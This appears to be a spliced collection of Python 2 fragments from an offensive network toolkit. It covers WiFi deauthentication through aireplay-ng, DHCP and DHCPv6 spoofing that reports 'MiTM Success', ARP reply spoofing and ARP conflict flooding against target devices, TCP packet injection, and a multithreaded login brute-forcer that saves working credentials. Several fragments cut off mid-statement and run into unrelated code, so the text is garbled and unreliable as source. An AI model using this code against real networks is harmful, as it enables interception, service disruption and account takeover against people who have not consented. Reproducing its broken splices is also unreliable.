def scan(self, network_interface, timeout=3, retry=3, target_mac_address=None, check_vendor=True):
# region Set variables
self.target_mac_address = target_mac_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
self.icmpv6_identifier = randint(1, 65535)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Unique results
for index in range(len(self.results)):
if self.results[index]['mac-address'] not in self.mac_addresses:
self.unique_results.append(self.results[index])
self.mac_addresses.append(self.results[index]['mac-address'])
# endregion
# region Reset results and mac addresses list
self.results = []
self.mac_addresses = []
# endregion
# region Get vendors
for result_index in range(len(self.unique_results)):
# Get current MAC address prefix
current_mac_prefix = self.eth.get_mac_prefix(self.unique_results[result_index]['mac-address'])
# Search this prefix in vendor list
for vendor_index in range(len(self.vendor_list)):
if current_mac_prefix == self.vendor_list[vendor_index]['prefix']:
self.unique_results[result_index]['vendor'] = self.vendor_list[vendor_index]['vendor']
break
# Could not find this prefix in vendor list
if 'vendor' not in self.unique_results[result_index].keys():
self.unique_results[result_index]['vendor'] = "Unknown vendor"
# endregion
# region Return results
return self.unique_results
def deauth_packets_send():
# Start DHCP or ARP requests sniffer function
tm = ThreadManager(2)
tm.add_task(dhcp_request_sniffer)
sleep(3)
# Set WiFi channel on interface for send WiFi deauth packets
sub.Popen(['iwconfig ' + deauth_network_interface + ' channel ' + channel],
shell=True)
Base.print_info("Send WiFi deauth packets ...")
# Start deauth packets numbers = 3
deauth_packets_number = 3
while not sniff_dhcp_request:
# Start aireplay-ng process
try:
aireplay_process = sub.Popen([
'aireplay-ng ' + deauth_network_interface + ' -0 ' +
str(deauth_packets_number) + ' -a ' + bssid + ' -c ' +
target_mac_address
],
shell=True,
stdout=sub.PIPE)
while True:
output = aireplay_process.stdout.readline()
if output == '' and aireplay_process.poll() is not None:
break
if output:
stdout.write(
re.sub(r'(\d\d:\d\d:\d\d (Waiting|Sending))',
Base.c_info + r'\g<1>', output))
except OSError as e:
if e.errno == errno.ENOENT:
Base.print_error("Program: ", "aireply-ng",
" is not installed!")
exit(1)
else:
Base.print_error(
"Something else went wrong while trying to run ",
"`aireply-ng`")
exit(2)
# Wait before sniff ARP or DHCP request packet
sleep(5)
# Add 5 packets to number of WiFi deauth packets
if deauth_packets_number < 30:
deauth_packets_number += 5
def get_mac_address(self,
network_interface,
target_ip_address,
timeout=5,
retry=5):
try:
# region Set variables
self.target_ip_address = target_ip_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Return
if 'mac-address' in self.results[0].keys():
return self.results[0]['mac-address']
else:
return "ff:ff:ff:ff:ff:ff"
# endregion
except IndexError:
return "ff:ff:ff:ff:ff:ff"
except KeyboardInterrupt:
self.base.print_info("Exit")
exit(0)
def search_router(self, network_interface, timeout=3, retry=3):
# region Set variables
self.router_search = True
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Return results
return self.router_info
# if request.haslayer(DHCP6_Decline):
# print Base.c_warning + "Sniff DHCPv6 Decline from: " + request[IPv6].src + " (" + \
# request[Ether].src + ") TID: " + hex(request[DHCP6_Decline].trid) + \
# " IAADDR: " + request[DHCP6OptIAAddress].addr
# # print request.summary
# endregion
# endregion
# region Main function
if __name__ == "__main__":
# region Send ICMPv6 advertise packets in other thread
tm.add_task(send_icmpv6_advertise_packets)
# endregion
# region Add multicast MAC addresses on interface
try:
Base.print_info("Get milticast MAC address on interface: ",
current_network_interface)
mcast_addresses = sub.Popen(
['ip maddress show ' + current_network_interface],
shell=True,
stdout=sub.PIPE)
out, err = mcast_addresses.communicate()
if icmpv6_router_solicitation_address not in out:
icmpv6_mcast_address = sub.Popen([
'ip maddress add ' + icmpv6_router_solicitation_address +
option_code=_dhcp_option_code,
relay_agent_ip=_current_ip_address)
sendp(request_packet,
iface=_current_network_interface,
verbose=False)
except KeyError:
print Base.c_error + "Key error, this transaction id: " + hex(
xid) + " not found in our transactions!"
except:
print Base.c_error + "Unknown error!"
if request[DHCP].options[0][1] == 5:
_ack_received = True
print Base.c_success + "ACK from: " + Base.cSUCCESS + siaddr + Base.cEND + " your client ip: " + \
Base.cSUCCESS + yiaddr + Base.cEND
if request[DHCP].options[0][1] == 6:
print Base.c_error + "NAK from: " + Base.cERROR + siaddr + Base.cEND + " your client ip: " + \
Base.cERROR + yiaddr + Base.cEND
if __name__ == "__main__":
tm = ThreadManager(2)
tm.add_task(send_dhcp_discover)
print Base.c_info + "Sniffing interface: " + str(
_current_network_interface)
sniff(filter="udp and src port 67 and dst port 67 and dst host " +
_current_ip_address,
prn=send_dhcp_request,
iface=_current_network_interface)
if request.haslayer(DHCP6_Decline):
print Base.c_warning + "Sniff DHCPv6 Decline from: " + request[IPv6].src + " (" + \
request[Ether].src + ") TID: " + hex(request[DHCP6_Decline].trid) + \
" IAADDR: " + request[DHCP6OptIAAddress].addr
# print request.summary
# Print MiTM Success message
if request[Ether].src in icmpv6_neighbor_solicit_your_offer_ipv6 \
and request[Ether].src in icmpv6_neighbor_solicit_your_ipv6 \
and request[Ether].src in dhcpv6_request_in_your_server and request[Ether].src not in mitm_success:
print Base.c_success + "MiTM Success: " + offers[request[Ether].src] + " (" + request[Ether].src + ")"
mitm_success.append(request[Ether].src)
if __name__ == "__main__":
tm.add_task(send_icmpv6_solicit_packets)
tm.add_task(send_icmpv6_advertise_packets)
tm.add_task(send_dhcpv6_solicit_packets)
if args.target_ipv6 is not None:
if args.target_mac is None:
print Base.c_error + "Please set target MAC address (--target_mac 00:AA:BB:CC:DD:FF) for target IPv6!"
exit(1)
if args.target_mac is None:
print Base.c_info + "Waiting for a ICMPv6 RS or DHCPv6 requests ..."
sniff(lfilter=lambda d: d.src != your_mac_address and (ICMPv6ND_RS in d or ICMPv6ND_NS in d
or DHCP6_Solicit in d or DHCP6_Request in d
or DHCP6_Release in d or DHCP6_Confirm in d
or DHCP6_Decline in d),
prn=reply, iface=current_network_interface)
src_port = randint(1024, 65535)
else:
src_port = args.src_port
dst_ip_address = args.target_ip
if args.target_mac is None:
dst_mac_address = Base.get_mac(current_network_interface,
dst_ip_address)
dst_port = args.target_port
data = args.data
print Base.c_info + "Interface: " + current_network_interface
print Base.c_info + "Src MAC: " + src_mac_address
print Base.c_info + "Src IP: " + src_ip_address
print Base.c_info + "Src PORT: " + str(src_port)
print Base.c_info + "Dst MAC: " + dst_mac_address
print Base.c_info + "Dst IP: " + dst_ip_address
print Base.c_info + "Dst PORT: " + str(dst_port)
tm.add_task(sender)
print Base.c_info + "Waiting for TCP connection from " + dst_ip_address + " or ARP ... "
sniff(filter="(tcp and src host " + dst_ip_address + " and src port " +
str(dst_port) + " and dst host " + src_ip_address +
" and dst port " + str(src_port) + ") or arp",
prn=get_syn_and_ack_numbers,
iface=current_network_interface)
Base.print_error(
"Could not find device MAC address with IP address: ",
target_ip)
exit(1)
else:
apple_device = [target_ip, target_mac]
# endregion
# region Print target IP and MAC address
Base.print_info("Target: ",
apple_device[0] + " (" + apple_device[1] + ")")
# endregion
# region Start sniffer
tm = ThreadManager(2)
tm.add_task(sniffer)
# endregion
# region Send first ARP reply
sleep(5)
Base.print_warning("Send first (init) ARP reply ...")
send_arp_reply()
# endregion
# region Wait for completion
tm.wait_for_completion()
# endregion
except KeyboardInterrupt:
Base.print_info("Exit")
exit(0)
login_list_len = len(login_list)
print output.info + "Login list size: " + str(login_list_len)
valid_login_file = host + "_" + valid_login_file
successful_login_file = host + "_" + successful_login_file
print output.info + "Valid logins write to file: " + valid_login_file
print output.info + "Successful login credentials write to file: " + valid_login_file
password_list.append(args.password)
print output.info + "Password: "******"Number of threads: " + str(args.threads)
print output.info + "Start brute ..."
if args.threads > 1:
tm = ThreadManager(args.threads + 1)
step = int(login_list_len / args.threads)
for thread in range(1, args.threads + 1):
positions = {"start": (step*(thread-1)) + 1, "stop": step*thread}
tm.add_task(brute, **positions)
sleep(1)
tm.wait_for_completion()
else:
positions = {"start": 1, "stop": login_list_len}
brute(**positions)
exit(0)
def scan(self,
network_interface,
timeout=3,
retry=3,
target_ip_address=None,
check_vendor=True):
# region Set variables
self.target_ip_address = target_ip_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Create vendor list
if check_vendor:
with open(self.mac_prefixes_file, 'r') as mac_prefixes_descriptor:
for string in mac_prefixes_descriptor.readlines():
string_list = string.split(" ", 1)
self.vendor_list.append({
"prefix": string_list[0],
"vendor": string_list[1][:-1]
})
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Unique results
for index in range(len(self.results)):
if self.results[index]['mac-address'] not in self.mac_addresses:
self.unique_results.append(self.results[index])
self.mac_addresses.append(self.results[index]['mac-address'])
# endregion
# region Reset results and mac addresses list
self.results = []
self.mac_addresses = []
# endregion
# region Get vendors
for result_index in range(len(self.unique_results)):
# Get current MAC address prefix
current_mac_prefix = self.eth.get_mac_prefix(
self.unique_results[result_index]['mac-address'])
# Search this prefix in vendor list
for vendor_index in range(len(self.vendor_list)):
if current_mac_prefix == self.vendor_list[vendor_index][
'prefix']:
self.unique_results[result_index][
'vendor'] = self.vendor_list[vendor_index]['vendor']
break
# Could not find this prefix in vendor list
if 'vendor' not in self.unique_results[result_index].keys():
self.unique_results[result_index]['vendor'] = "Unknown vendor"
# endregion
# region Return results
return self.unique_results
target_ip=Base.get_netiface_random_ip(_current_network_interface))
# endregion
# region Send only ARP reply packets
if args.answers:
for _ in range(_number_of_packets):
_sock.send(_arp_response)
sleep(0.5)
_sock.close()
# endregion
# region Send broadcast ARP request packets
else:
# region Start ARP sniffer
TM.add_task(arp_sniffer)
# endregion
# region Start send ARP requests
while _make_conflict:
if _current_number_of_packets == _number_of_packets:
break
else:
Base.print_info(
"Send Multicast ARP request to: ",
str(_target_ip_address) + " (" +
str(_target_mac_address) + ")")
_sock.send(_arp_request)
sleep(3)
_current_number_of_packets += 1
# endregion